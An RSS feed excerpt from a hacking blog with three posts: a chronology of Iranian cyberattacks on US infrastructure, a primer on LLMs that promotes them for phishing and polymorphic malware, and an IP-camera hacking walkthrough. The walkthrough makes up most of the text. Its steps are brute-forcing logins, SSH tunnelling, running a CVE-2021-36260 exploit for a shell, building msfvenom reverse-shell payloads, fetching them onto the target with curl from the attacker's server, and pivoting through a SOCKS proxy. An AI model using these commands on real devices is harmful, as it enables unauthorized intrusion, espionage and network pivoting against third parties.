<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="682" src="https://hackers-arise.com/wp-content/uploads/2025/06/fukusima-accident-1024x682.jpg" alt="" class="wp-image-15786" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/fukusima-accident-1024x682.jpg 1024w, https://hackers-arise.com/wp-content/uploads/2025/06/fukusima-accident-300x200.jpg 300w, https://hackers-arise.com/wp-content/uploads/2025/06/fukusima-accident-768x512.jpg 768w, https://hackers-arise.com/wp-content/uploads/2025/06/fukusima-accident.jpg 1247w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
In this era of cyberwar, nations without significant kinetic (guns, planes, boats, bullets) capabilities can counter this lack with cyberwar capabilities. This is often referred to as asymmetric warfare. One nation spends trillions of dollars on aircraft carriers, stealth bombers, rockets, and an army of millions versus a nation with a handful of skilled hackers, with computers, internet access, in a bunker can counter the military behemoth at less than 1% of the cost. A good part of Ukraine’s success at holding off the much larger and better equipped Russian military over the last 3 years can be attributed to this asymmetric warfare from Ukraine’s cyberwarriors. Can Iran’s cyberwarriors do the same?
Iran has a highly skilled entourage of hackers that have targeted US industrial facilities for decades. SCADA/ICS are the favored target in cyberwar. By compromising SCADA/ICS facilities, the attacker can; 
<ol class="wp-block-list">
<li>weaken the local economy, </li>
<li>limit the availability of clean drinking water,</li>
<li>Limit communication (mobile and Internet)</li>
<li>Restrict availability of electricity</li>
<li>Blow Up a facility thereby using the it as a weapon</li>
<li>Limit the ability to manufacture war products</li>
</ol>
This list could go on and on and all of these attacks have been used in the Ukraine/Russia war . 
SCADA/ICS attacks can be devastating!
Iran has long been interested in compromising US industrial facilities. Over the past decade (2015–2025), Iran has repeatedly targeted U.S. infrastructure through a range of cyberattacks. 
Below I have created a brief chronology and description of significant Iranian cyber operations against U.S. infrastructure sectors, based on public indictments, government advisories, and major news reports.
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="1-financial-sector-ddos-attacks-20112013-publicize">1. Financial Sector DDoS Attacks (2011–2013; publicized in 2016)</h2>
<ul class="wp-block-list">
<li>Actors: Izz ad-Din al-Qassam Cyber Fighters, linked to the Iranian government and Islamic Revolutionary Guard Corps (IRGC).</li>
<li>Method: Large-scale distributed denial-of-service (DDoS) attacks.</li>
<li>Targets: Nearly 50 major U.S. financial institutions, including Bank of America, New York Stock Exchange, and Capital One.</li>
<li>Impact: Disrupted online banking for millions; tens of millions of dollars in response costs.</li>
<li>Details: Botnets generated up to 140Gbps of traffic, overwhelming bank servers.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="2-bowman-avenue-dam-intrusion-2013-indictment-in-2">2. Bowman Avenue Dam Intrusion (2013; indictment in 2016)</h2>
<ul class="wp-block-list">
<li>Actors: Iranian hackers employed by ITSec Team and Mersad Co., working for the IRGC.</li>
<li>Method: Unauthorized access to a small dam’s SCADA system in Rye Brook, New York.</li>
<li>Impact: Attackers accessed status and operational data; physical sabotage was averted only because the sluice gate was offline for maintenance.</li>
<li>Significance: Demonstrated intent and capability to target U.S. industrial control systems.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="3-boston-childrens-hospital-attack-attempt-2022">3. Boston Children’s Hospital Attack Attempt (2022)</h2>
<ul class="wp-block-list">
<li>Actors: Three Iranian nationals indicted.</li>
<li>Method: Attempted cyberattack, specifics undisclosed.</li>
<li>Target: Boston Children’s Hospital.</li>
<li>Impact: FBI intervention prevented disruption; hospital network and patient care protected.</li>
<li>Significance: Highlighted Iranian willingness to target healthcare infrastructure.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="4-water-utilities-attacks-20232024">4. Water Utilities Attacks (2023–2024)</h2>
<ul class="wp-block-list">
<li>Actors: CyberAv3ngers, an IRGC-affiliated group.</li>
<li>Method: Exploitation of vulnerabilities in Israeli-made Unitronics PLCs (industrial control devices), often using default passwords.</li>
<li>Targets: At least a Pittsburgh-area water utility and nearly ten other small U.S. water utilities.</li>
<li>Impact: One utility (Aliquippa, PA) forced to operate a water pump station manually; others experienced limited operational impact.</li>
<li>Significance: Demonstrated ability to disrupt physical infrastructure and the risk to under-resourced utilities</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="5-healthcare-sector-attacks-20232024">5. Healthcare Sector Attacks (2023–2024)</h2>
<ul class="wp-block-list">
<li>Actors: Iranian cyber actors, sometimes collaborating with ransomware affiliates.</li>
<li>Method: Disruption and extortion attempts, including ransomware.</li>
<li>Targets: U.S. healthcare organizations and hospitals.</li>
<li>Impact: Attempts to lock networks and extort victims; ongoing threat to patient care and data security.</li>
<li>Significance: Shows expansion of Iranian targeting to vital civilian infrastructure.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="6-critical-infrastructure-brute-force-campaigns-20">6. Critical Infrastructure Brute-Force Campaigns (2023–2024)</h2>
<ul class="wp-block-list">
<li>Actors: Iranian state-sponsored hackers.</li>
<li>Method: Brute-force credential attacks to compromise user accounts and modify multi-factor authentication (MFA) settings for persistent access.</li>
<li>Targets: Multiple sectors, including healthcare, government, IT, engineering, and energy.</li>
<li>Impact: Enabled persistent access to sensitive systems, sometimes selling credentials on criminal forums for further exploitation.</li>
<li>Significance: Highlights persistent, multi-sector targeting and credential theft as a vector.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="7-malware-targeting-industrial-control-systems-202">7. Malware Targeting Industrial Control Systems (2023–2025)</h2>
<ul class="wp-block-list">
<li>Actors: CyberAv3ngers, IRGC Cyber-Electronic Command.</li>
<li>Method: Deployment of malware (e.g., IOControl) against ICS/SCADA devices.</li>
<li>Targets: U.S. critical infrastructure sectors, including water and energy.</li>
<li>Impact: Potential for deep network access and more profound cyber-physical effects.</li>
<li>Significance: Ongoing U.S. government efforts to identify and sanction responsible individuals.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="summary-table">Summary Table</h2>
<figure class="wp-block-table"><table class="has-fixed-layout"><thead><tr><th>Year(s)</th><th>Sector</th><th>Attack/Method</th><th>Impact/Notes</th></tr></thead><tbody><tr><td>2011–2013</td><td>Financial</td><td>DDoS</td><td>Major bank disruptions, tens of millions in damages</td></tr><tr><td>2013</td><td>Industrial (Dam)</td><td>SCADA intrusion</td><td>No physical damage, but access to controls</td></tr><tr><td>2022</td><td>Healthcare</td><td>Attempted cyberattack</td><td>FBI intervention, no disruption</td></tr><tr><td>2023–2024</td><td>Water Utilities</td><td>ICS/PLC exploitation</td><td>Manual operation required at one utility</td></tr><tr><td>2023–2024</td><td>Healthcare</td><td>Ransomware, extortion</td><td>Disruption, extortion attempts</td></tr><tr><td>2023–2024</td><td>Critical Infrastructure</td><td>Brute-force, MFA compromise</td><td>Persistent access, credential theft</td></tr><tr><td>2023–2025</td><td>Industrial/ICS</td><td>Malware (IOControl)</td><td>Deep access, ongoing threat</td></tr></tbody></table></figure>
<hr class="wp-block-separator has-alpha-channel-opacity"/>

Summary

With the world teetering on the brink of another full-scale war, Iran may choose to counter-attack with cyber operations. Their history and capabilities would indicate that this would be there most likely vector for countering a US kinetic attack.
To learn more about SCADA/ICS Hacking and Security, unique training program at the link below.
<a href="https://hackersarise.thinkific.com/courses/hacking-scada-systems">https://hackersarise.thinkific.com/courses/hacking-scada-systems</a>

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="489" height="179" src="https://hackers-arise.com/wp-content/uploads/2025/06/scada-testo.png" alt="" class="wp-image-15784" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/scada-testo.png 489w, https://hackers-arise.com/wp-content/uploads/2025/06/scada-testo-300x110.png 300w" sizes="(max-width: 489px) 100vw, 489px" /></figure>The post <a href="https://hackers-arise.com/if-the-us-attacks-iran-will-iran-attack-us-industrial-facilities-scada-ics/">Now that the US Has Bombed Iran, Should We Expect Attacks Against US Critical Industrial Infrastructure (SCADA/ICS)?</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/if-the-us-attacks-iran-will-iran-attack-us-industrial-facilities-scada-ics/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>How Artificial Intelligence (AI) Large Language Models (LLMs) Work, Part 1</title>
<link>https://hackers-arise.com/how-artificial-intelligence-ai-large-language-models-llms-work-part-1/</link>
<comments>https://hackers-arise.com/how-artificial-intelligence-ai-large-language-models-llms-work-part-1/#respond</comments>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Fri, 20 Jun 2025 16:22:29 +0000</pubDate>
<category><![CDATA[Artificial Intelligence]]></category>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Defensive Security]]></category>
<category><![CDATA[Offensive Security]]></category>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15771</guid>
<description><![CDATA[Welcome back, my aspiring cyberwarriors! We are living on the cusp of one of the most exciting eras in the history of technology! Artificial Intelligence (AI) is about to change everything we do and change the way the world operates. This change will likely be more dramatic and consequential than the invention of printing press […]
The post <a href="https://hackers-arise.com/how-artificial-intelligence-ai-large-language-models-llms-work-part-1/">How Artificial Intelligence (AI) Large Language Models (LLMs) Work, Part 1</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, my aspiring cyberwarriors!
We are living on the cusp of one of the most exciting eras in the history of technology!
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1024" height="576" src="https://hackers-arise.com/wp-content/uploads/2025/06/LLM-pic.webp" alt="" class="wp-image-15777" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/LLM-pic.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/06/LLM-pic-300x169.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/LLM-pic-768x432.webp 768w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Artificial Intelligence (AI) is about to change everything we do and change the way the world operates. This change will likely be more dramatic and consequential than the invention of printing press or the development of the internet. For this reason, it is incumbent upon you to try to understand what is taking place and how. Only in this way, can you stay ahead of this tsunami and ride this wave to better job and a higher income. Those who ignore this wave will likely be washed away into the dustbin of history.
With that goal in mind, I have started this series on how large language models (LLM) work in AI.
Under the Hood
At the core of every LLM lies the transformer architecture—a neural network designed to handle sequences (like sentences or code). Unlike older models that processed words one-by-one, transformers analyze entire sequences in parallel using self-attention. This mechanism lets the model weigh the importance of every word in a sentence relative to others. For example:
<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
“The hacker breached the router” Here, “breached” links strongly to “hacker” and “router,” ignoring irrelevant words. This contextual understanding is what makes LLMs so powerful
</blockquote>
<a rel="noreferrer noopener" target="_blank" href="https://wandb.ai/mostafaibrahim17/ml-articles/reports/An-Overview-of-Large-Language-Models-LLMs---VmlldzozODA3MzQz"></a><a rel="noreferrer noopener" target="_blank" href="https://aws.amazon.com/what-is/large-language-model/"></a>.
<h2 class="wp-block-heading">Training: Gorging on Data</h2>
LLMs train on massive text corpora—think Wikipedia, books, code repositories, and web pages (GPT-3 devoured 45TB of text!). During training:
<ol class="wp-block-list">
<li>Tokenization: Text is split into chunks (tokens), which can be words, subwords, or symbols.</li>
<li>Embedding: Tokens convert into numerical vectors (e.g., “router” → <code>[0.24, -1.7, ...]</code>), capturing semantic relationships. Similar words cluster in vector space<a href="https://wandb.ai/mostafaibrahim17/ml-articles/reports/An-Overview-of-Large-Language-Models-LLMs---VmlldzozODA3MzQz" target="_blank" rel="noreferrer noopener"></a></li>
<li>Next-Word Prediction: The model learns by guessing the next token in sequences. Correct guesses reinforce connections; errors adjust the model’s 175 billion+ parameters (weights/biases)</li>
</ol>
This unsupervised pre-training teaches grammar, facts, and reasoning—no human labels needed.
<h2 class="wp-block-heading">Text Generation: The Inference Loop</h2>
When you prompt an LLM, here’s what happens under the hood:
<ol class="wp-block-list">
<li>Tokenize Input: Your prompt (“Explain VPNs to a hacker”) splits into tokens.</li>
<li>Process Through Layers:
<ul class="wp-block-list">
<li>Embedding layer converts tokens to vectors.</li>
<li>Transformer layers apply self-attention and feed-forward networks to build context.</li>
<li>Output layer generates a probability distribution for the next token<a href="https://wandb.ai/mostafaibrahim17/ml-articles/reports/An-Overview-of-Large-Language-Models-LLMs---VmlldzozODA3MzQz" target="_blank" rel="noreferrer noopener"></a><a href="https://codilime.com/blog/what-is-large-language-model-llm-explained/" target="_blank" rel="noreferrer noopener"></a></li>
</ul>
</li>
<li>Sample and Repeat: The model picks the next token (e.g., “VPNs” → “create”), appends it, and repeats until done.</li>
</ol>
 Note: Control output randomness with:
<ul class="wp-block-list">
<li><code>temperature</code> (higher = more creative)</li>
<li><code>top-p</code> (limits sampling to high-probability tokens)</li>
</ul>
<h2 class="wp-block-heading">Why Hackers Should Care</h2>
LLMs are force multipliers:
<ul class="wp-block-list">
<li>Social Engineering: Generate convincing phishing emails or fake personas.</li>
<li>Code Automation: Write scripts for scanning, exploits, or tooling (e.g., “Write a Python port scanner”).</li>
<li>Recon: Summarize leaked docs or technical manuals in seconds.</li>
<li>Obfuscation: Use LLMs to craft polymorphic malware or evade detection.</li>
</ul>
Gotcha: LLMs hallucinate. Always verify outputs—especially for critical ops
<h2 class="wp-block-heading">Build Your Own LLM: Minimalist Demo</h2>
Would you like to train a nano-LLM? Here’s the basic skeleton in Python to get started.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="581" height="227" src="https://hackers-arise.com/wp-content/uploads/2025/06/LLM-python.png" alt="" class="wp-image-15776" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/LLM-python.png 581w, https://hackers-arise.com/wp-content/uploads/2025/06/LLM-python-300x117.png 300w" sizes="(max-width: 581px) 100vw, 581px" /></figure>
This uses GPT-2 to complete the phrase. You swap <code>gpt2</code> for larger models (e.g., <code>gpt-j-6B</code>) and complex results.
<h2 class="wp-block-heading">The Future: LLMs in Offensive Security</h2>
Imagine:
<ul class="wp-block-list">
<li>AI Red Teamers: LLMs that autonomously probe networks for weaknesses.</li>
<li>Adaptive Malware: Code that rewrites itself using LLM feedback loops.</li>
<li>Counter-LLM Warfare: Detecting AI-generated disinformation in ops.</li>
</ul>
Rule #1: Never trust an LLM blindly. Treat it like a rookie hacker—verify its work
<h2 class="wp-block-heading">Conclusion</h2>
LLMs are neural networks on steroids: trained on internet-scale data, masters of context, and invaluable for hacking. Understand their architecture, leverage their generative power, and stay sharp—because in the AI arms race, the best hackers adapt fastest.
Stay curious. Stay dangerous.
<hr class="wp-block-separator has-alpha-channel-opacity"/>
The post <a href="https://hackers-arise.com/how-artificial-intelligence-ai-large-language-models-llms-work-part-1/">How Artificial Intelligence (AI) Large Language Models (LLMs) Work, Part 1</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/how-artificial-intelligence-ai-large-language-models-llms-work-part-1/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Network Espionage: Using Russian Cameras as Proxies to Hide Your Data</title>
<link>https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy/</link>
<comments>https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy/#respond</comments>
<dc:creator><![CDATA[Alita]]></dc:creator>
<pubDate>Fri, 20 Jun 2025 14:01:40 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[IoT Hacking]]></category>
<category><![CDATA[IP Camera Hacking]]></category>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15739</guid>
<description><![CDATA[Hello, cyberwarriors. You’ve heard how camera hacking plays a role in espionage. In our previous series, we covered how we’ve been spying on Russian forces in occupied Ukrainian territory. During the ongoing cyberwar, we’ve gained access to a large number of cameras across Russia, starting in the occupied areas and reaching deep into Moscow. This […]
The post <a href="https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy/">Network Espionage: Using Russian Cameras as Proxies to Hide Your Data</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="900" height="550" src="https://hackers-arise.com/wp-content/uploads/2025/06/digital-camera-2.jpg" alt="" class="wp-image-15768" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/digital-camera-2.jpg 900w, https://hackers-arise.com/wp-content/uploads/2025/06/digital-camera-2-300x183.jpg 300w, https://hackers-arise.com/wp-content/uploads/2025/06/digital-camera-2-768x469.jpg 768w" sizes="(max-width: 900px) 100vw, 900px" /></figure>
<h3 class="wp-block-heading"></h3>
Hello, cyberwarriors. You’ve heard how camera hacking plays a role in espionage. In our previous series, we covered how we’ve been spying on Russian forces in occupied Ukrainian territory. During the ongoing cyberwar, we’ve gained access to a large number of cameras across Russia, starting in the occupied areas and reaching deep into Moscow.
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://hackers-arise.com/wp-content/uploads/2025/06/1-moscow-city-camera-view-1024x576.webp" alt="" class="wp-image-15741" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/1-moscow-city-camera-view-1024x576.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/06/1-moscow-city-camera-view-300x169.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/1-moscow-city-camera-view-768x432.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/06/1-moscow-city-camera-view.webp 1366w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>

This time, we’re taking it further and showing how compromising a camera can give you access to the network behind it.
Now let’s say you’ve compromised a camera and want to pivot deeper into the network. We’ll walk through a few examples, starting with enabling SSH and ending with deploying payloads using unpatched vulnerabilities. In part 2 and 3 you will learn how to analyze and modify the firmware.
<h2 class="wp-block-heading"><a></a>Case 1: Hikvision</h2>
Hikvision is one of the most common camera brands used across Russia. As shown in the screenshot below, thousands of their devices are exposed online via Shodan. Many of them still haven’t been patched against known vulnerabilities like CVE-2021-36260, even in 2025. This vulnerability can give you shell access on the device.

<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="451" src="https://hackers-arise.com/wp-content/uploads/2025/06/2-shodan-hikvision-results-1024x451.webp" alt="" class="wp-image-15742" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/2-shodan-hikvision-results-1024x451.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/06/2-shodan-hikvision-results-300x132.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/2-shodan-hikvision-results-768x338.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/06/2-shodan-hikvision-results.webp 1345w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>

If you brute-force a password and get into the web interface, go to the settings and enable SSH. This setting is often available on Hikvision cameras and sometimes on other brands.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="923" height="401" src="https://hackers-arise.com/wp-content/uploads/2025/06/3-hikvision-settings-enabling-ssh.webp" alt="" class="wp-image-15743" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/3-hikvision-settings-enabling-ssh.webp 923w, https://hackers-arise.com/wp-content/uploads/2025/06/3-hikvision-settings-enabling-ssh-300x130.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/3-hikvision-settings-enabling-ssh-768x334.webp 768w" sizes="(max-width: 923px) 100vw, 923px" /></figure>

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="540" height="195" src="https://hackers-arise.com/wp-content/uploads/2025/06/4-hikvision-camera-ssh-enabled.webp" alt="" class="wp-image-15744" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/4-hikvision-camera-ssh-enabled.webp 540w, https://hackers-arise.com/wp-content/uploads/2025/06/4-hikvision-camera-ssh-enabled-300x108.webp 300w" sizes="(max-width: 540px) 100vw, 540px" /></figure>

Once SSH is on, set up an SSH tunnel to route your traffic through the camera with the same credentials:
kali > ssh -D 9050 -4 admin@<camera_ip>

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="752" height="137" src="https://hackers-arise.com/wp-content/uploads/2025/06/5-hikvision-camera-ssh-tunneling.webp" alt="" class="wp-image-15745" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/5-hikvision-camera-ssh-tunneling.webp 752w, https://hackers-arise.com/wp-content/uploads/2025/06/5-hikvision-camera-ssh-tunneling-300x55.webp 300w" sizes="(max-width: 752px) 100vw, 752px" /></figure>

If credentials work, you’re in. Sometimes the SSH port expects a different set of credentials. Remember, the SSH setting might automatically disable after a while, so you’ll need to re-enable it via the dashboard.
Now configure proxychains:
kali > sudo nano /etc/proxychains4.conf

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="452" height="143" src="https://hackers-arise.com/wp-content/uploads/2025/06/6-proxychains4-config-editing.webp" alt="" class="wp-image-15746" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/6-proxychains4-config-editing.webp 452w, https://hackers-arise.com/wp-content/uploads/2025/06/6-proxychains4-config-editing-300x95.webp 300w" sizes="(max-width: 452px) 100vw, 452px" /></figure>

Make sure the port (9050) matches what you used in the SSH tunnel. With this setup, you can begin scanning the internal network. Most cameras aren’t segmented from other devices, so once you’re inside, you can talk to almost anything. Let’s do a basic network scan through the camera. Note that in the example below I used a different port:
kali > proxychains4 nmap 192.168.1.0/24 -Pn

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="863" height="362" src="https://hackers-arise.com/wp-content/uploads/2025/06/7-actively-tunneling-traffic-through-the-camera.webp" alt="" class="wp-image-15747" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/7-actively-tunneling-traffic-through-the-camera.webp 863w, https://hackers-arise.com/wp-content/uploads/2025/06/7-actively-tunneling-traffic-through-the-camera-300x126.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/7-actively-tunneling-traffic-through-the-camera-768x322.webp 768w" sizes="(max-width: 863px) 100vw, 863px" /></figure>

If nmap isn’t available, use nc:
kali > proxychains4 nc -zv 192.168.1.15 445
For easier subnet scanning, you can automate this with a simple bash loop. It’s important to know how to scan hosts with nc, because your target might not have all the necessary tools installed.
<h2 class="wp-block-heading"><a></a>Case 2: CVE-2021-36260</h2>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="926" height="284" src="https://hackers-arise.com/wp-content/uploads/2025/06/8-hikvision-cve-on-github.webp" alt="" class="wp-image-15748" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/8-hikvision-cve-on-github.webp 926w, https://hackers-arise.com/wp-content/uploads/2025/06/8-hikvision-cve-on-github-300x92.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/8-hikvision-cve-on-github-768x236.webp 768w" sizes="(max-width: 926px) 100vw, 926px" /></figure>

This Hikvision vulnerability is still unpatched on many systems. If you find a target with this flaw, run the exploit like this:
kali > git clone https://github.com/Aiminsun/CVE-2021-36260
kali > cd CVE-2021-36260
kali > python3 CVE-2021-36260.py –rport <camera_port> –rhost <camera_ip> –shell

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="714" height="338" src="https://hackers-arise.com/wp-content/uploads/2025/06/9-hikvision-shell-exploted-by-the-cve.webp" alt="" class="wp-image-15749" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/9-hikvision-shell-exploted-by-the-cve.webp 714w, https://hackers-arise.com/wp-content/uploads/2025/06/9-hikvision-shell-exploted-by-the-cve-300x142.webp 300w" sizes="(max-width: 714px) 100vw, 714px" /></figure>

Once you have a shell, you will need a payload to turn the camera into a network proxy. Let’s see how to generate the right payload based on the device’s architecture.
<h3 class="wp-block-heading">Architecture</h3>
Fist you want to determine the architecture of the target:
target > uname -m
Common outputs and what they mean:
x86 or i686: 32-bit Intel x86_64: 64-bit Intel armv7l: ARM mips, mipsel: MIPS variants
<h3 class="wp-block-heading"><a></a>Payload Generation</h3>
For 32-bit Intel:
kali > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="963" height="147" src="https://hackers-arise.com/wp-content/uploads/2025/06/10-x86-metepreter.webp" alt="" class="wp-image-15750" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/10-x86-metepreter.webp 963w, https://hackers-arise.com/wp-content/uploads/2025/06/10-x86-metepreter-300x46.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/10-x86-metepreter-768x117.webp 768w" sizes="(max-width: 963px) 100vw, 963px" /></figure>

For 64-bit Intel:
kali > msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="965" height="139" src="https://hackers-arise.com/wp-content/uploads/2025/06/11-x64-meterpreter.webp" alt="" class="wp-image-15751" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/11-x64-meterpreter.webp 965w, https://hackers-arise.com/wp-content/uploads/2025/06/11-x64-meterpreter-300x43.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/11-x64-meterpreter-768x111.webp 768w" sizes="(max-width: 965px) 100vw, 965px" /></figure>

For ARM:
kali > msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="987" height="132" src="https://hackers-arise.com/wp-content/uploads/2025/06/12-armle-meterpreter.webp" alt="" class="wp-image-15752" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/12-armle-meterpreter.webp 987w, https://hackers-arise.com/wp-content/uploads/2025/06/12-armle-meterpreter-300x40.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/12-armle-meterpreter-768x103.webp 768w" sizes="(max-width: 987px) 100vw, 987px" /></figure>

For MIPS:
kali > msfvenom -p linux/mipsle/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="987" height="134" src="https://hackers-arise.com/wp-content/uploads/2025/06/13-misple-meterpreter.webp" alt="" class="wp-image-15753" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/13-misple-meterpreter.webp 987w, https://hackers-arise.com/wp-content/uploads/2025/06/13-misple-meterpreter-300x41.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/13-misple-meterpreter-768x104.webp 768w" sizes="(max-width: 987px) 100vw, 987px" /></figure>

Once generated, upload and run the payload.
<h3 class="wp-block-heading"><a></a>File Upload</h3>
Simply use curl while hosting a payload on an HTTP server. First go to the directory where the payload was generated and then set up an HTTP server:
kali > cd payload
kali > python3 -m http.server
target > curl -O <a href="http://kali_ip:8000/shell.elf">http://kali_ip:8000/shell.elf</a>
target > chmod +x shell.elf
target > ./shell.elf
If you have an SSH port open, you can use this:
kali > scp shell.elf admin@<camera_ip>:/tmp/shell.elf
target > cd /tmp
target > chmod +x shell.elf
target > ./shell.elf
<h3 class="wp-block-heading"><a></a>Listener</h3>
On your machine, set up a handler with the same payload to receive the connection.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="638" height="139" src="https://hackers-arise.com/wp-content/uploads/2025/06/14-setting-up-a-listener.webp" alt="" class="wp-image-15754" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/14-setting-up-a-listener.webp 638w, https://hackers-arise.com/wp-content/uploads/2025/06/14-setting-up-a-listener-300x65.webp 300w" sizes="(max-width: 638px) 100vw, 638px" /></figure>

<h3 class="wp-block-heading">Meterpreter Proxy</h3>
Once we get a Meterpreter session back, we need to set up routing. Routing in Metasploit defines which hosts are reachable through a session:
Meterpreter > run autoroute -s 192.168.1.0/24
Meterpreter > background
msf6 > use auxiliary/server/socks_proxy
msf6 > run -j

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="825" height="173" src="https://hackers-arise.com/wp-content/uploads/2025/06/15-meterpreter-proxy-settings.webp" alt="" class="wp-image-15755" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/15-meterpreter-proxy-settings.webp 825w, https://hackers-arise.com/wp-content/uploads/2025/06/15-meterpreter-proxy-settings-300x63.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/15-meterpreter-proxy-settings-768x161.webp 768w" sizes="(max-width: 825px) 100vw, 825px" /></figure>

Here is how the module should be configured. If needed, update your proxychains4.conf to point to your proxy (9050), and now you can scan and move within the internal network as needed, just like in the first case.
<h2 class="wp-block-heading"><a></a>Bonus: Cracking Hashes</h2>
There is yet another way to get into Hikvision cameras. In some cases, the firewall blocks your attempt to land a shell using the –shell option from the CVE-2021-36260 exploit. When that happens, you can fall back on brute forcing the password hash from the admin panel.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="421" height="188" src="https://hackers-arise.com/wp-content/uploads/2025/06/16-list-of-vulnerable-hosts.webp" alt="" class="wp-image-15756" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/16-list-of-vulnerable-hosts.webp 421w, https://hackers-arise.com/wp-content/uploads/2025/06/16-list-of-vulnerable-hosts-300x134.webp 300w" sizes="(max-width: 421px) 100vw, 421px" /></figure>

Start by using the command below to try and extract the contents of the /etc/ directory:
python3 CVE-2021-36260.py –rhost <camera_ip> –rport <camera_port> –cmd “cat /etc/*”

